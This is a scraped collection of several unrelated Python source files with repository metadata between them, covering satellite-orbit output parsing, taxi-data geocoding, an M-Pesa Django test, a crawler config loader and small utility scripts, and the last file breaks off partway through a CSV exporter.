    pre_buckets = get_window_buckets(input_dir, tslist[idx - windowlen])
    return cur_buckets, pre_buckets
def get_window_buckets(input_dir, ts):
    ''' Get the buckets in a window.

    Merges the per-timestamp bucket files of the `windowlen` timestamps
    ending at `ts` (inclusive) into a single {kwp: [entries]} dict.
    '''
    tslist = get_timestamps_in_dir(input_dir)
    fnlist = get_datafiles_in_dir(input_dir)
    cfg = get_config()
    idx = tslist.index(ts)
    windowlen = cfg['storyline']['windowlen']
    # Caller must guarantee a full window of history exists.
    assert(idx + 1 >= windowlen)
    buckets = {}
    for i in range(idx + 1 - windowlen, idx + 1):
        b = jsonload(os.path.join(input_dir, fnlist[i]))
        for k in b:
            if k not in buckets:
                buckets[k] = []
            buckets[k].extend(b[k])
    return buckets
if __name__ == '__main__':
main()
| shiguangwang/storyline | storyline/eventdetect.py | eventdetect.py | py | 6,449 | python | en | code | 0 | github-code | 90 |
11212186057 | import random
# Read the desired array length from the user (the prompt is in Russian:
# "Enter the number of array elements:").
lenght = int(input('Введите количество эллементов массива: '))
num = []
i = 0
# Fill the list with random integers in [0, 100].
while i < lenght:
    num.append(round(random.random()*100))
    i += 1
print(num)
i = 0
# Print the smallest element, then remove one occurrence of it and print
# the new minimum — i.e. the second-smallest value (equal to the first
# minimum when it occurred more than once).
min1 = min(num)
print(min(num))
num.remove(min1)
min2 = min(num)
if min2 == min1:
    print(min1)
else:
    print(min2)
33706485158 | # from netCDF4 import Dataset
import numpy as np
import pandas as pd
# import os
import datetime
def my_function():
    """Print a fixed greeting to stdout (module smoke-test helper)."""
    greeting = "Hello World"
    print(greeting)
class iieout_read:
    '''
    This class reads the iieout data and returns information based on user input.
    '''
    def __init__(self, iieout_file):
        # Path to the GEODYN iieout file to scan.
        self.iieout_file = iieout_file
        # Marker of the line reporting the converged iteration number.
        self.text_iternumber = 'CONVERGENCE'
        # Header preceding each station-satellite configuration entry.
        self.text_find_sats = "STATION-SATELLITE CONFIGURATION DSS1WRNG 9806701"
    def find_satIDs(self):
        '''Return the unique satellite IDs found in the iieout file, in
        first-appearance order.'''
        allsats = []
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if self.text_find_sats in line:
                    # Fixed-width field: columns 90:100 hold the sat ID.
                    allsats.append(int(line[90:100]))
        # De-duplicate while preserving order.
        SatIDs = []
        for sat in allsats:
            if sat not in SatIDs:
                SatIDs.append(sat)
        return SatIDs
class read_ascii_xyz:
    '''
    This class reads the ascii_xyz data and returns information based on user input.

    Pairs a GEODYN ascii_xyz ephemeris file with its companion iieout file
    (used to find the final converged iteration) and extracts the
    trajectory data for the single user-chosen satellite.
    '''
    def __init__(self, ascii_xyz_file, iieout_file, choose_sat):
        # Paths to the two GEODYN output files and the satellite ID whose
        # data should be extracted.
        self.ascii_xyz_file = ascii_xyz_file
        self.iieout_file = iieout_file
        # self.text_find_sats = "ARC 1 FOR INNER ITERATION 6 OF GLOBAL ITERATION 1"
        self.choose_sat = choose_sat
    def iteration_number(self):
        '''
        This function opens the iieout file, and returns the final iteration number
        '''
        # Keep the last line containing 'CONVERGENCE'; the converged
        # iteration count sits in fixed columns 39:42 of that line.
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if 'CONVERGENCE' in line:
                    line_text = line
                    # print(line)
        num_iters = float(line_text[39:42])-1
        return num_iters
    def find_satIDs(self):
        '''
        This function loops through the ascii_xyz file and returns the satellite ID
        numbers by identifying all the unique satellite IDs
        '''
        numiters = read_ascii_xyz.iteration_number(self)
        text_find_sats = "ARC 1 FOR INNER ITERATION %d OF GLOBAL ITERATION 1" % int(numiters)
        allsats = []
        with open(self.ascii_xyz_file, 'r') as f:
            for line_no, line in enumerate(f):
                if text_find_sats in line:
                    # Fixed-width field: columns 45:54 hold the sat ID.
                    allsats.append((int(line[45:54])))
        # De-duplicate while preserving first-appearance order.
        SatIDs = []
        for sat in allsats:
            if sat not in SatIDs:
                SatIDs.append(sat)
        return SatIDs
    def get_single_sat_data(self):
        '''
        This function loops through only the final iteration of the axi_xyz file,
        and returns a dictionary that contains all the data for one single satellite.
        In this function it is a satellite chosen by the user.
        Eventually this should be update to return info for ALL satellites.
        '''
        # First need to construct a dictionary that has all the line numbers where each
        # satellite appears:
        numiters = read_ascii_xyz.iteration_number(self)
        SatIDs_ascii = read_ascii_xyz.find_satIDs(self)
        SatID_dict = {}
        iteration = str(int(numiters))
        for val_sat in SatIDs_ascii:
            print(val_sat)
            lines = []
            text = str(val_sat) + " OF ARC 1 FOR INNER ITERATION "+ iteration
            with open(self.ascii_xyz_file, 'r') as f:
                for line_no, line in enumerate(f):
                    if text in line:
                        lines.append(line_no)
            SatID_dict[val_sat] = lines
        # Next, we need to loop through and grab the data.
        # Because of the weird formatting, we search for the satellite header.
        # If the header line starts with 1 the next 3 lines are headers and we skip them
        # If the header line starts with 0, the next line has the data
        data_dict = {}
        isat = self.choose_sat
        iii = 0
        # for iii, isat in enumerate(SatID_dict):
        B = pd.DataFrame(data={'YYMMDD' :[], # DATE GREENWICH TIME
                            'HHMM' :[],
                            'SECONDS' :[],
                            'X' :[], # INERTIAL CARTESIAN COORDINATES
                            'Y' :[],
                            'Z' :[],
                            'XDOT' :[], # INERTIAL CARTESIAN VELOCITY
                            'YDOT' :[],
                            'ZDOT' :[],
                            'LAT' :[], # GEODETIC EAST SPHEROID
                            'LONG' :[],
                            'HEIGHT' :[]})
        # print(SatID_dict)
        for iline in SatID_dict[isat]:
            # Peek at the line right after the header to decide how many
            # rows to skip before the data.
            with open(self.ascii_xyz_file, 'r') as f:
                for _ in range(iline):
                    f.readline()
                line = f.readline()
            if int(line[0]) == 0:
                ephems_csv = pd.read_csv(self.ascii_xyz_file,
                                         skiprows = iline+1,
                                         nrows = 3,
                                         names = ['YYMMDD',
                                                 'HHMM',
                                                 'SECONDS',
                                                 'X',
                                                 'Y',
                                                 'Z',
                                                 'XDOT',
                                                 'YDOT',
                                                 'ZDOT',
                                                 'LAT',
                                                 'LONG',
                                                 'HEIGHT',
                                                 ],
                                         sep = '\s+',
                                         )
            elif int(line[0]) == 1:
                ephems_csv = pd.read_csv(self.ascii_xyz_file,
                                         skiprows = iline+3,
                                         nrows = 3,
                                         names = ['YYMMDD',
                                                 'HHMM',
                                                 'SECONDS',
                                                 'X',
                                                 'Y',
                                                 'Z',
                                                 'XDOT',
                                                 'YDOT',
                                                 'ZDOT',
                                                 'LAT',
                                                 'LONG',
                                                 'HEIGHT',
                                                 ],
                                         sep = '\s+',
                                         )
                # NOTE(review): the concat below sits under the elif branch
                # only, so rows read in the `if` branch above are never
                # appended to B — confirm whether that is intentional.
                A = pd.DataFrame(ephems_csv)
                B = pd.concat([ B, A])
        # Drop rows whose HHMM field is not numeric (stray header rows).
        index_list = []
        for index, row in B.iterrows():
            try:
                float(row['HHMM'])
            except:
                index_list.append(index)
                continue
        C=B.drop(index_list)
        data_dict[isat] = C
        # print(C)
        date_isat = read_ascii_xyz.make_datetime_column(data_dict[isat], VERBOSE_timer=True)
        data_dict[isat]['Date'] = date_isat
        return data_dict
    def make_datetime_column(isat_data, VERBOSE_timer):
        # NOTE: effectively a static helper — it takes the DataFrame
        # directly (no `self`) and is called unbound via the class.
        # Builds one datetime per row from the packed YYMMDD/HHMM/SECONDS
        # columns and returns the list of datetimes.
        if VERBOSE_timer == True:
            import time
            start = time.time()
        else:
            pass
        # Zero-pad HHMM to four characters so slicing below is safe.
        timeHHMM = []
        for i,val in enumerate(isat_data['HHMM'].values.astype(int)):
            if len(str(val)) == 3:
                timehhmm_val = '0'+ str(val)
                timeHHMM.append(timehhmm_val)
            if len(str(val)) == 2:
                timehhmm_val = '00'+ str(val)
                timeHHMM.append(timehhmm_val)
            if len(str(val)) == 4:
                timehhmm_val = str(val)
                timeHHMM.append(timehhmm_val)
            if len(str(val)) == 1:
                timehhmm_val = '000'+ str(val)
                timeHHMM.append(timehhmm_val)
            # print(val)
        # print('1!!!!', np.shape(timeHHMM))
        isat_data['timeHHMM'] = timeHHMM
        year = []
        month = []
        day = []
        hours = []
        minutes = []
        secs = []
        microsecs = []
        # Split the packed date/time fields into their components.
        # NOTE(review): the '20' century prefix assumes all dates are in
        # the 2000s — confirm against the data being processed.
        for i,val in enumerate(isat_data['YYMMDD'].values.astype(int).astype(str)):
            # print(val)
            year.append('20' + val[:2])
            month.append(val[2:4])
            day.append(val[4:])
            # print('HERE',isat_data['timeHHMM'].values.astype(str)[i][:2])
            hours.append(isat_data['timeHHMM'].values.astype(str)[i][:2])
            minutes.append(isat_data['timeHHMM'].values.astype(str)[i][2:4])
            secs.append(isat_data['SECONDS'].values.astype(str)[i][:2])
            # microsecs.append(isat_data['Sec-UTC-R'][i][3:])
        isat_data['year'] = year
        isat_data['month'] = month
        isat_data['day'] = day
        isat_data['hours'] = hours
        isat_data['minutes'] = minutes
        isat_data['secs'] = secs
        # isat_data['microsecs'] = microsecs
        if VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Loop through and extract indiv date vals:",elapsed)
        else:
            pass
        # Seconds like '.5' get a leading '0' so int() below succeeds.
        fix_decimal = []
        for i,val in enumerate(isat_data['secs'].astype(str)):
            # print(i,val)
            if val.find('.') == 1:
                # print(i, val)
                fix_decimal.append( '0'+val[:-1])
                # print(newval)
            else:
                fix_decimal.append( val)
        if VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Fix decimals in the seconds column:",elapsed)
        else:
            pass
        year= list(map(int, isat_data['year'].values))
        month= list(map(int, isat_data['month'].values))
        day= list(map(int, isat_data['day'].values))
        hour= list(map(int, isat_data['hours'].values))
        minute = list(map(int, isat_data['minutes'].values))
        second = list(map(int, fix_decimal))
        DATE = list(map(datetime.datetime, year,month, day, hour,minute,second ))
        if VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Put all dates in a single column:",elapsed)
        else:
            pass
        return(DATE)
class read_residuals_iieout:
    '''
    This class reads the iieout data and returns the observation residuals.
    '''
    def __init__(self, iieout_file, VERBOSE_timer):
        # Path to the iieout file and a flag enabling timing printouts.
        self.iieout_file = iieout_file
        self.VERBOSE_timer =VERBOSE_timer
    def iteration_number(self):
        '''
        This function opens the iieout file, and returns the final iteration number
        '''
        # Keep the last 'CONVERGENCE' line; columns 39:42 hold the count.
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if 'CONVERGENCE' in line:
                    line_text = line
                    # print(line)
        num_iters = float(line_text[39:42])-1
        return num_iters
    # find the satellites in the GEODYN run:
    def find_Sat_IDs_resids(self):
        # Collect the unique satellite IDs (order preserved) from the
        # station-satellite configuration lines.
        text="STATION-SATELLITE CONFIGURATION DSS1WRNG 9806701"
        allsats = []
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if text in line:
                    # Fixed-width field: columns 70:81 hold the sat ID.
                    allsats.append(int(line[70:81]) )
                    # print(line)
        SatIDs = []
        for sat in allsats:
            if sat not in SatIDs:
                SatIDs.append(sat)
        iteration = read_residuals_iieout.iteration_number(self)
        text_obs_resid = 'OBSERVATION RESIDUALS FOR ARC 1 FOR INNER ITERATION '+ str(int(iteration))
        lines_list = [] #np.empty(np.size(num_observations))
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if text_obs_resid in line:
                    # print(line_no)
                    lines_list.append(line_no)
        # line_no_1 =lines_list
        # lines = search_iiesout_all_line_numbers(iieout_file, text)
        line_no_1 = lines_list[0]
        line_no_2 = lines_list[-1]
        # NOTE(review): the block below repeats the satellite scan from
        # the top of this method verbatim, and line_no_1/line_no_2 above
        # are never used — looks like leftover duplication.
        text="STATION-SATELLITE CONFIGURATION DSS1WRNG 9806701"
        allsats = []
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if text in line:
                    allsats.append(int(line[70:81]) )
                    # print(line)
        SatIDs = []
        for sat in allsats:
            if sat not in SatIDs:
                SatIDs.append(sat)
        return SatIDs
    def make_datetime_column(resid_df, self):
        # NOTE: unusual signature — the DataFrame is the first positional
        # argument and `self` the second; callers pass (df, self).
        # Builds one datetime (with microseconds) per row from the packed
        # YYMMDD/HHMM/Sec-UTC-R columns and returns the list.
        if self.VERBOSE_timer == True:
            import time
            start = time.time()
        else:
            pass
        # Zero-pad HHMM to four characters so slicing below is safe.
        timeHHMM = []
        for i,val in enumerate(resid_df['HHMM']):
            if len(val) == 3:
                timehhmm_val = '0'+ val
                timeHHMM.append(timehhmm_val)
            if len(val) == 2:
                timehhmm_val = '00'+ val
                timeHHMM.append(timehhmm_val)
            if len(val) == 4:
                timehhmm_val = val
                timeHHMM.append(timehhmm_val)
            if len(val) == 1:
                timehhmm_val = '000'+ val
                timeHHMM.append(timehhmm_val)
        np.shape(timeHHMM)
        resid_df['timeHHMM'] = timeHHMM
        year = []
        month = []
        day = []
        hours = []
        minutes = []
        secs = []
        microsecs = []
        # Split the packed date/time fields into their components.
        # NOTE(review): the '20' century prefix assumes 2000s dates.
        for i,val in enumerate(resid_df['YYMMDD']):
            year.append('20' + val[:2])
            month.append(val[2:4])
            day.append(val[4:])
            hours.append(resid_df['timeHHMM'][i][:2])
            minutes.append(resid_df['timeHHMM'][i][2:4])
            secs.append(resid_df['Sec-UTC-R'][i][:2])
            microsecs.append(resid_df['Sec-UTC-R'][i][3:])
        resid_df['year'] = year
        resid_df['month'] = month
        resid_df['day'] = day
        resid_df['hours'] = hours
        resid_df['minutes'] = minutes
        resid_df['secs'] = secs
        resid_df['microsecs'] = microsecs
        if self.VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Loop through and extract indiv date vals:",elapsed)
        else:
            pass
        # Seconds like '.5' get a leading '0' so int() below succeeds.
        fix_decimal = []
        for i,val in enumerate(resid_df['secs'].astype(str)):
            # print(i,val)
            if val.find('.') == 1:
                # print(i, val)
                fix_decimal.append( '0'+val[:-1])
                # print(newval)
            else:
                fix_decimal.append( val)
        if self.VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Fix decimals in the seconds column:",elapsed)
        else:
            pass
        year= list(map(int, resid_df['year'].values))
        month= list(map(int, resid_df['month'].values))
        day= list(map(int, resid_df['day'].values))
        hour= list(map(int, resid_df['hours'].values))
        minute = list(map(int, resid_df['minutes'].values))
        second = list(map(int, fix_decimal))
        microsecond= list(map(int, resid_df['microsecs'].values))
        DATE = list(map(datetime.datetime, year,month, day, hour,minute,second,microsecond ))
        if self.VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Put all dates in a single column:",elapsed)
        else:
            pass
        return(DATE)
    def read_observed_resids_by_sat(self ):
        # def read_obs_residuals(iieout_file, iteration, VERBOSE_timer):
        iteration = str(int(read_residuals_iieout.iteration_number(self)))
        # VERBOSE_timer = True
        if self.VERBOSE_timer == True:
            import time
            start = time.time()
        else:
            pass
        #-------------------------------------------------------------------------------
        '''
        Now find all the instances of the OBSERVATION RESIDUALS
        header at this iteration. These are stored in a list.
        '''
        text_obs_resid = 'OBSERVATION RESIDUALS FOR ARC 1 FOR INNER ITERATION '+ str(int(iteration))
        SatIDs = read_residuals_iieout.find_Sat_IDs_resids(self)
        lines_list = [] #np.empty(np.size(num_observations))
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if text_obs_resid in line:
                    # print(line_no)
                    lines_list.append(line_no)
        # line_no_1 =lines_list
        import time
        start = time.time()
        init_df = pd.DataFrame(data={'YYMMDD' :[],
                            'HHMM' :[],
                            'Sec-UTC-R' :[],
                            'Observation' :[],
                            'Residual' :[],
                            'Ratio to sigma' :[],
                            'Elev1' :[],
                            'Elev2' :[],
                            'OBS No.' :[],
                            'Block' :[],})
        dict_sat = {}
        for i in SatIDs:
            dict_sat[i]= init_df
        for i,iline in enumerate(lines_list):
            # Read the line after the header to find which satellite this
            # residual section belongs to (fixed columns 70:81).
            with open(self.iieout_file, 'r') as f:
                for _ in range(iline+1):
                    f.readline()
                line = f.readline()
            sat_line = int(line[70:81]) #int(line[90:100])
            print(line)
            print(sat_line)
            # NOTE(review): the read below always uses lines_list[0] and
            # lines_list[0 + 1] instead of the current `iline`, so every
            # loop pass re-reads the same first section — confirm intent
            # (likely should be lines_list[i] / lines_list[i + 1]).
            RESID_OBSERV = pd.read_csv(self.iieout_file,
                                       skiprows = lines_list[0] + 6 ,
                                       nrows = int((lines_list[0 + 1]-6 - lines_list[0]-7) ),
                                       names = ['YYMMDD',
                                               'HHMM',
                                               'Sec-UTC-R',
                                               'Observation',
                                               'Residual',
                                               'Ratio to sigma',
                                               'Elev1',
                                               'Elev2',
                                               'OBS No.',
                                               'Block'],
                                       sep = '\s+',
                                       )
            A = pd.DataFrame(RESID_OBSERV)
            B = dict_sat[sat_line]
            dict_sat[sat_line] = pd.concat([ B, A])
            end = time.time()
            elapsed = end - start
            print("Elapsed time:",elapsed)
            print(i ,'/', str(len(lines_list)))
        # NOTE(review): only the last chunk is returned; dict_sat (the
        # per-satellite accumulation) is discarded — confirm intent.
        return RESID_OBSERV
    def read_observed_resids_all(self):
        iteration = str(int(read_residuals_iieout.iteration_number(self)))
        if self.VERBOSE_timer == True:
            import time
            start = time.time()
        else:
            pass
        #-------------------------------------------------------------------------------
        '''
        First we need to find how many observations there are:
        '''
        text_smry_meas = 'RESIDUAL SUMMARY BY MEASUREMENT TYPE FOR ARC 1 INNER ITERATION '+ (iteration) +' OF GLOBAL ITERATION 1'
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if text_smry_meas in line:
                    # print(line_no)
                    # lines_list= (line_no)
                    RESID_OBSERV = pd.read_csv(self.iieout_file,
                        skiprows = line_no+2 , # to 53917
                        nrows = 4,
                        names = ['num','NUMBER', 'MEAN','RMS','No.WTD', 'wtd-mean','wtd-rms','Type'],
                        sep = '\s+',
                        )
        # NOTE(review): np.float was removed in NumPy 1.24 — this line
        # raises AttributeError on modern NumPy; use float(...) instead.
        num_observations = np.float(RESID_OBSERV.num.sum())
        text_obs_resid = 'OBSERVATION RESIDUALS FOR ARC 1 FOR INNER ITERATION '+ (iteration)
        num_observations = num_observations
        #-------------------------------------------------------------------------------
        '''
        Now find all the instances of the OBSERVATION RESIDUALS
        header at this iteration. These are stored in a list.
        '''
        lines_list = [] #np.empty(np.size(num_observations))
        with open(self.iieout_file, 'r') as f:
            for line_no, line in enumerate(f):
                if text_obs_resid in line:
                    # print(line_no)
                    lines_list.append(line_no)
        # line_no_1 =lines_list
        # lines = search_iiesout_all_line_numbers(iieout_file, text)
        line_no_1 = lines_list[0]
        line_no_2 = lines_list[-1]
        #-------------------------------------------------------------------------------
        '''
        Use the first and last line numbers from above to select
        the sections of data that contains the observation residuals.
        The outputted csv data are stored as A
        '''
        RESID_OBSERV = pd.read_csv(self.iieout_file,
                                   skiprows = line_no_1 + 6 ,
                                   nrows = int((line_no_2 - line_no_1) ),
                                   names = ['YYMMDD',
                                           'HHMM',
                                           'Sec-UTC-R',
                                           'Observation',
                                           'Residual',
                                           'Ratio to sigma',
                                           'Elev1',
                                           'Elev2',
                                           'OBS No.',
                                           'Block'],
                                   sep = '\s+',
                                   )
        if self.VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Elapsed time after line search setup:",elapsed)
        else:
            pass
        #-------------------------------------------------------------------------------
        '''
        We now need to fix the data that contains a lot of misplaced
        characters, random strings, and headers
        '''
        A = pd.DataFrame(RESID_OBSERV) # input
        index_list = []
        for index, row in A.iterrows():
            try:
                float(row['OBS No.'])
                float(row['HHMM'])
            except:
                index_list.append(index)
                continue
        B=A.drop(index_list)
        if self.VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Elapsed time after loop through then drop indecies:",elapsed)
        else:
            pass
        #-------------------------------------------------------------------------------
        '''
        We locate the index of the last observation number and remove
        all datapoints that are after it in the DataFrame
        '''
        C = B.reset_index()
        # NOTE(review): `last_index` is never defined in this method — the
        # next line raises NameError at runtime; it presumably should be
        # the positional index of the last real observation row.
        index_drops = np.arange(last_index, np.shape(C["OBS No."]))
        index_drops
        D = C.drop(index_drops)
        if self.VERBOSE_timer == True:
            end = time.time()
            elapsed = end - start
            print("Elapsed time after dropping all bad indicies after last obs no.:",elapsed)
        dates = read_residuals_iieout.make_datetime_column(D, self)
        D['Date'] = dates
        # Strip a trailing flag character from non-numeric ratio values.
        fix_string = []
        for i,val in enumerate(D['Ratio to sigma']):
            try:
                float(val)
                fix_string.append(val)
            except:
                # print(i, val)
                fix_string.append(val[:-1])
        D['Ratio_to_sigma_fixed'] = fix_string
        return(D)
| zachwaldron4/pygeodyn | notebooks/old_analysis/util_funcs/util_graveyard/Read_GEODYN_output.py | Read_GEODYN_output.py | py | 24,582 | python | en | code | 4 | github-code | 90 |
# Find counts (i, j, k) of 10000/5000/1000-yen bills such that
# i + j + k == n and the total equals y; print "-1 -1 -1" when impossible.
n, y = map(int, input().split())
rem = 0
for i in range(y//10000 +1):
    rem = y-10000*i
    for j in range(rem//5000 + 1):
        # Whatever is left is assumed to be made of 1000-yen bills
        # (y is a multiple of 1000 in this problem's input).
        k = (rem - 5000*j) // 1000
        if (i + j+ k) == n:
            print(i, j, k)
            break
    else:
        # Inner loop found nothing: try the next i.
        continue
    # Inner loop broke with a solution: stop the outer loop too.
    break
else:
    print(-1, -1, -1)
41545043086 | import pandas as pd
from geopy.geocoders import Nominatim
from tqdm import tqdm
import numpy as np
import re
import time
import csv
print("Here we go")
# NOTE(review): Nominatim without a user_agent is rejected by newer
# geopy/Nominatim policies — confirm before re-running.
geolocator = Nominatim()
data = pd.read_csv("data_with_weekdays.csv")
print('Data read! ')
# check nan value for pick up point
data = data[np.isfinite(data['Pickup_latitude'])]
print(data.shape)
# modify the lat & long in order to get addresses
# for weekdays change coordinates granularities
# Round to 3 decimals (~100 m) and build "lat ,lon" strings so nearby
# pickups collapse onto the same coordinate key.
lat_day = data['Pickup_latitude'].tolist()
lon_day = data['Pickup_longitude'].tolist()
lat_day = [round(i,3) for i in lat_day]
lat_day = [str(i) for i in lat_day]
lon_day = [round(i,3) for i in lon_day]
lon_day =[str(i) for i in lon_day]
lon_day =[' ,'+ i for i in lon_day]
coor_day = [x+y for x,y in zip(lat_day,lon_day)]
set1 = set(coor_day)
unique_coord = list(set1)
print('Done')
data['Coor'] = coor_day
# for count merging later
df1=pd.DataFrame({'Coor':unique_coord})
addresses = []
notfound = 0
# Reverse-geocode each unique coordinate (1 request/second to respect
# the Nominatim rate limit).
for i in tqdm(unique_coord):
    location = geolocator.reverse(i,timeout=50)
    if location.address == None:
        location ='NaN'
        notfound += 1
        addresses.append(location)
        print(len(addresses))
        print(addresses[-1])
        print("%d" % notfound+ 'hasnt been found')
    else:
        print(location.address)
        addresses.append(location.address)
        print(len(addresses))
        print(addresses[-1])
    time.sleep(1)
print(len(addresses))
print(df1.shape)
df1['address'] = addresses
# merge address to dataframe
# merge frist then count
# COUNT meaning the amount of taxi in that certain address
# Extract 5-digit ZIP codes from the free-form addresses.
zipcodes = []
for i in addresses:
    num = re.findall(r"\D(\d{5})\D", i)
    num = list(filter(str.isdigit, num))
    zipcode = ''.join(num)
    zipcodes.append(zipcode)
# add zipcode
df1['zipcode'] = zipcodes
df1.to_csv("zipcodes_coords.csv")
#merge
data =pd.merge(data, df1, how='left', on=['Coor'])
#Count taxi amount in certain Zip Code
# add zipcode frequency aka Taxi demand to original dataframe
data['Taxi_Demand'] = data.groupby('zipcode')['zipcode'].transform('count')
data.to_csv('full_data.csv')
print('Done')
| ruoyucad/NYC_greentaxi | source/feature_engineering_taxi_demand.py | feature_engineering_taxi_demand.py | py | 2,080 | python | en | code | 1 | github-code | 90 |
30785032175 | # -*- coding: utf-8 -*-
class Order:
    """A trading order sent to an exchange.

    Attributes mirror the constructor parameters; ``history`` collects the
    order's lifecycle events.
    """
    # Class-level defaults (kept for backward compatibility with code
    # that reads attributes off the class itself).
    orderId = ''
    timestamp = ''
    exchange = ''
    route = ''
    symbol = ''
    side = ''
    type = ''
    price = 0.0
    quantity = 0
    history = []
    def __init__(self, orderID, timestamp, exchange, route, symbol, side, type, price, quantity):
        self.orderId = orderID
        self.timestamp = timestamp
        self.exchange = exchange
        self.route = route
        self.symbol = symbol
        self.side = side
        self.type = type
        self.price = price
        self.quantity = quantity
        # BUGFIX: `history` used to exist only as a single class-level
        # list shared by every Order instance, so appending to one order's
        # history mutated all of them. Give each instance its own list.
        self.history = []
class OrderEvent:
    """An event in an order's lifecycle (fill, cancel, reject, ...).

    ``body`` carries the event payload as a dict; ``evtorigin`` records
    where the event came from.
    """
    # Class-level defaults kept for backward compatibility.
    orderId = ''
    timestamp = 0.0
    evttype = ''
    # BUGFIX: this default was misspelled `evtorigim` while __init__ sets
    # `evtorigin`, so the class-level default never backed the attribute.
    evtorigin = ''
    body = {}
    def __init__(self, orderId, timestamp, evttype, evtorigin, body):
        self.orderId = orderId
        self.timestamp = timestamp
        self.evttype = evttype
        self.evtorigin = evtorigin
        self.body = body
| fybbr/gotcha | ambitious/entities.py | entities.py | py | 923 | python | en | code | 0 | github-code | 90 |
10959460561 | from __future__ import unicode_literals
from django.urls import reverse
from django.test import TestCase
from trial_version.environ import *
from trial_version.mpesa.utils import *
class EnvironTestCase(TestCase):
    """Django tests for environment config loading and the M-Pesa OAuth
    token endpoint."""
    def test_environ(self):
        # The test environment file defines TEST_CREDENTIAL=12345.
        value = mpesa_config('TEST_CREDENTIAL')
        self.assertEqual(value, '12345')
    def test_oauth_correct_credentials(self):
        '''
        Test correct credentials sent to oauth endpoint
        '''
        r = generate_access_token_request()
        self.assertEqual(r.status_code, 200)
    def test_oauth_wrong_credentials(self):
        '''
        Test wrong credentials sent to OAuth endpoint
        '''
        consumer_key = 'wrong_consumer_key'
        consumer_secret = 'wrong_consumer_secret'
        r = generate_access_token_request(consumer_key, consumer_secret)
        self.assertEqual(r.status_code, 400)  # 400 Bad Request for invalid credentials
    def test_access_token_valid(self):
        '''
        Test that access token is never older than 50 minutes
        '''
        token = generate_access_token()
        delta = timezone.now() - token.created_at
        # NOTE(review): the %60 wraps the hour — a 70-minute-old token
        # reads as 10 minutes here; confirm whether total minutes were
        # intended (delta.total_seconds() // 60).
        minutes = (delta.total_seconds()//60)%60
        self.assertLessEqual(minutes, 50)
11088505163 | #encoding:UTF-8
import argparse
import ConfigParser
class MiniSpider:
    """Crawler configuration holder (Python 2 — uses ConfigParser).

    Parses the -c/--conf command-line argument and loads the [spider]
    section of the given INI file into the attributes below.
    """
    # Defaults; overwritten per instance by __getConf__.
    url_list_file=""
    output_directory=""
    max_depth=1
    crawl_interval=1
    crawl_timeout=1
    target_url=""
    thread_count=1
    def __init__(self):
        """Parse command-line arguments and load the config file they name."""
        parser = argparse.ArgumentParser()
        parser.add_argument('-c','--conf',help="the file of the conf")
        parser.add_argument('-v','--version', action='version',version='%(prog)s 1.0')
        args = parser.parse_args()
        confFile = args.conf
        self.__getConf__(confFile)
    def __getConf__(self,filename):
        """Read the [spider] section of `filename` into instance attributes."""
        configParser = ConfigParser.ConfigParser()
        configParser.read(filename)
        self.url_list_file = configParser.get("spider","url_list_file")
        self.output_directory = configParser.get("spider","output_directory")
        self.max_depth = configParser.getint("spider","max_depth")
        self.crawl_interval = configParser.getint("spider","crawl_interval")
        self.crawl_timeout = configParser.getint("spider","crawl_timeout")
        self.target_url = configParser.get("spider","target_url")
        self.thread_count = configParser.getint("spider","thread_count")
        #print self.url_list_file
        #print self.thread_count
if __name__=="__main__":
miniSpider = MiniSpider()
| NemoGood/mini_spider | mini_spider.py | mini_spider.py | py | 1,292 | python | en | code | 0 | github-code | 90 |
8589067605 | ## @package parsers.reliability2_exporter
import csv
from parsers.reliability2_parser import Reliability2Parser
from utils.backend_utils import BackendUtils
## This class writes details about a check2 object (a unit of data from the Reliability2 App) to a CSV file.
class Reliability2Exporter(object):
    ## Constructor
    # @param self
    # @param write_filename (string) path to the csv file we will write the data to
    # @param check2 (Check2) a Check2 object containing the data to write - see data_structs.Check2
    # NOTE(review): files are opened in 'wb'/'rb' but used with csv
    # reader/writer — Python 2 style; Python 3's csv module needs text
    # mode with newline=''. Confirm the target interpreter.
    def __init__(self, write_filename, check2):
        self.out_file = open(write_filename, 'wb')
        self.in_file = open(check2.csv_filename, 'rb')
        self.check2 = check2
    ## This method extracts data from the Check2 object and writes it to the csv file in a nicely formatted manner.
    # @param self
    # @param include_trans (boolean) If True, the method will append an extra CSV column containing the actual transcription
    # text that was entered by the user for each clip.
    # @param progress_update_fcn (function=None) function accepting a value in [0,1] to display as a progress bar - see utils.ProgressDialog. This value is used to indicate the level of completeness <em>of the current phase</em>
    # @param progress_next_phase_fcn(function=None) - moves the progress bar to the next phase, which causes new text to be displayed in the bar - see utils.ProgressDialog
    def export(self, include_trans, progress_update_fcn=None, progress_next_fcn=None):
        reader = csv.DictReader(self.in_file)
        extra_headers = ['Child Voc', 'Word Count']
        if include_trans:
            extra_headers.append('Transcription')
        out_headers = reader.fieldnames + extra_headers
        writer = csv.DictWriter(self.out_file, out_headers)
        writer.writeheader()
        #The composite key (child_code, timestamp) uniquely identifies a row (assuming a child can't be in two
        # places at the same time :) We are going to build a lookup table that is keyed based on this combination of values.
        #Match the rows: we can generate a dict of self.check2.test2s
        #and go through the input file one row at a time, storing matches in the out_rows array below.
        #We must store to this array in the order the tests were run, not the order they appear in the input file.
        test2_dict = {}
        for i in range(len(self.check2.test2s)):
            test2 = self.check2.test2s[i]
            key = test2.child_code + test2.spreadsheet_timestamp
            # Store the Test2 plus its run order so out_rows can be
            # filled in run order rather than spreadsheet order.
            test2_dict[key] = (test2, i)
        out_rows = [None] * len(self.check2.test2s)
        all_rows = list(reader)
        match_count = 0
        i = 0
